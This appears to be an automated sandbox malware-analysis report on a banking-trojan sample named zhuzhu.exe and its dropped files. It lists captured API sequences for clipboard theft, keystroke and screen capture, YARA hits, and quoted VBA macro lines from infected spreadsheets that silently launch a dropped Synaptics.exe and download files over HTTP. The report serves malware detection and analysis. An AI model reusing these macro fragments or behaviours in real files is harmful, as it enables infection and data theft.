                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: [esc]4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: [esc]4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: [esc]4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: [esc]4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,4_2_0377BC70
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,4_2_0377E4F0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                                      Source: Yara matchFile source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara matchFile source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.0.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: ._cache_zhuzhu.exe PID: 3624, type: MEMORYSTR
                                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\._cache_zhuzhu.exe, type: DROPPED

                                      E-Banking Fraud

                                      barindex
                                      Checks if browser processes are running
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads7_2_001B8A46

                                      Operating System Destruction

                                      barindex
                                      Protects its processes via BreakOnTermination flag
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess information set: 01 00 00 00

                                      System Summary

                                      barindex
                                      Document contains an embedded VBA macro with suspicious strings
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                      Document contains an embedded VBA with functions possibly related to ADO stream file operations
                                      Source: FHfEA7As.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                      Source: XZXHAVGRAG.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                      Document contains an embedded VBA with functions possibly related to HTTP operations
                                      Source: FHfEA7As.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                      Source: XZXHAVGRAG.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                      Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                                      Source: FHfEA7As.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                      Source: XZXHAVGRAG.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02861A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,1_2_02861A37
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02861087 NtdllDefWindowProc_W,1_2_02861087
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_0016E080: GetCurrentProcessId,CreateFileW,DeviceIoControl,CloseHandle,7_2_0016E080
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377B463 ExitWindowsEx,4_2_0377B463
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377B43F ExitWindowsEx,4_2_0377B43F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377B41B ExitWindowsEx,4_2_0377B41B
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10010F101_2_10010F10
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_028600321_2_02860032
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02870EE71_2_02870EE7
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776EE04_2_03776EE0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776C504_2_03776C50
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378E3414_2_0378E341
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037883814_2_03788381
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378EA1D4_2_0378EA1D
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037789004_2_03778900
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378F9FF4_2_0378F9FF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378D89F4_2_0378D89F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378DDF04_2_0378DDF0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037724B04_2_037724B0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C7122F4_2_02C7122F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C71E5C4_2_02C71E5C
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C6B66A4_2_02C6B66A
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C717804_2_02C71780
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C70CDE4_2_02C70CDE
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C624B04_2_02C624B0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C72D914_2_02C72D91
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD00324_2_02BD0032
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BE12064_2_02BE1206
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDB6414_2_02BDB641
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BE17574_2_02BE1757
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BE0CB54_2_02BE0CB5
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD24874_2_02BD2487
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BE2D684_2_02BE2D68
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0360F3BE4_2_0360F3BE
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0360D25E4_2_0360D25E
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F82BF4_2_035F82BF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F689F4_2_035F689F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0360D7AF4_2_0360D7AF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F1E6F4_2_035F1E6F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F660F4_2_035F660F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03607D404_2_03607D40
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0360DD004_2_0360DD00
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001992457_2_00199245
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001B592D7_2_001B592D
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001EC8E07_2_001EC8E0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001729607_2_00172960
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_0016AA007_2_0016AA00
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_0019AB337_2_0019AB33
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00180F047_2_00180F04
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001630C07_2_001630C0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001671F07_2_001671F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001D729C7_2_001D729C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001812817_2_00181281
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001674F07_2_001674F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E39707_2_001E3970
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001F39CB7_2_001F39CB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_0016FF007_2_0016FF00
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_0016FF707_2_0016FF70
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F4FF4947_2_5F4FF494
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F4DB3F07_2_5F4DB3F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F545F507_2_5F545F50
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52FE587_2_5F52FE58
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F53FC7C7_2_5F53FC7C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F50DCD67_2_5F50DCD6
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F50DBDB7_2_5F50DBDB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F529BEE7_2_5F529BEE
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F549AE07_2_5F549AE0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5138D17_2_5F5138D1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5458E07_2_5F5458E0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F53F7387_2_5F53F738
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5297E27_2_5F5297E2
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5137857_2_5F513785
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5457A07_2_5F5457A0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5435007_2_5F543500
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001EC8E012_2_001EC8E0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0017296012_2_00172960
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0016AA0012_2_0016AA00
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0019AB3312_2_0019AB33
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00180F0412_2_00180F04
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0016B05012_2_0016B050
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001630C012_2_001630C0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001671F012_2_001671F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0019924512_2_00199245
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001D729C12_2_001D729C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0018128112_2_00181281
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001674F012_2_001674F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E397012_2_001E3970
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001F39CB12_2_001F39CB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0016FF0012_2_0016FF00
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_0016FF7012_2_0016FF70
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                      Source: FHfEA7As.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                      Source: XZXHAVGRAG.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001F32AD appears 39 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E47DC appears 64 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E548A appears 42 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 5F51405E appears 62 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 5F528E24 appears 78 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001C4164 appears 67 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E453E appears 92 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00181BA2 appears 72 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 5F513F7C appears 87 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E5454 appears 83 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 0016B780 appears 69 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 5F513F0C appears 38 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00178675 appears 259 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 0017CC03 appears 40 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E5421 appears 800 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 001E4D50 appears 76 times
                                      Source: C:\Users\user\Downloads\inst.exeCode function: String function: 0016B680 appears 38 times
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: String function: 03784300 appears 32 times
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                      Source: zhuzhu.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                      Source: zhuzhu.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                      Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: RCXE77E.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst[1].exe.1.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst.exe.1.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                                      Source: ~$cache1.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: zhuzhu.exe, 00000000.00000003.1670734044.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1669279532.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1670734044.0000000000D56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName# vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exeBinary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exeBinary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: zhuzhu.exeBinary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe.1.drBinary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe.0.drBinary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: zhuzhu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@26/101@20/14
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F4D5930 SetLastError,GetLastError,SetLastError,GetLastError,_wcsrchr,_wcsncpy,_strerror,MultiByteToWideChar,_wcsncpy,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,FormatMessageW,_wcstok,_vswprintf_s,_wcsncpy,GetSystemTime,LocalFree,FreeLibrary,7_2_5F4D5930
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03777B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_03777B70
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03777740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_03777740
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03777620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,4_2_03777620
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F4D7A1F GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,7_2_5F4D7A1F
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,4_2_03776C50
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle,1_2_1000F260
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,4_2_03776150
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001D0145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource,7_2_001D0145
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
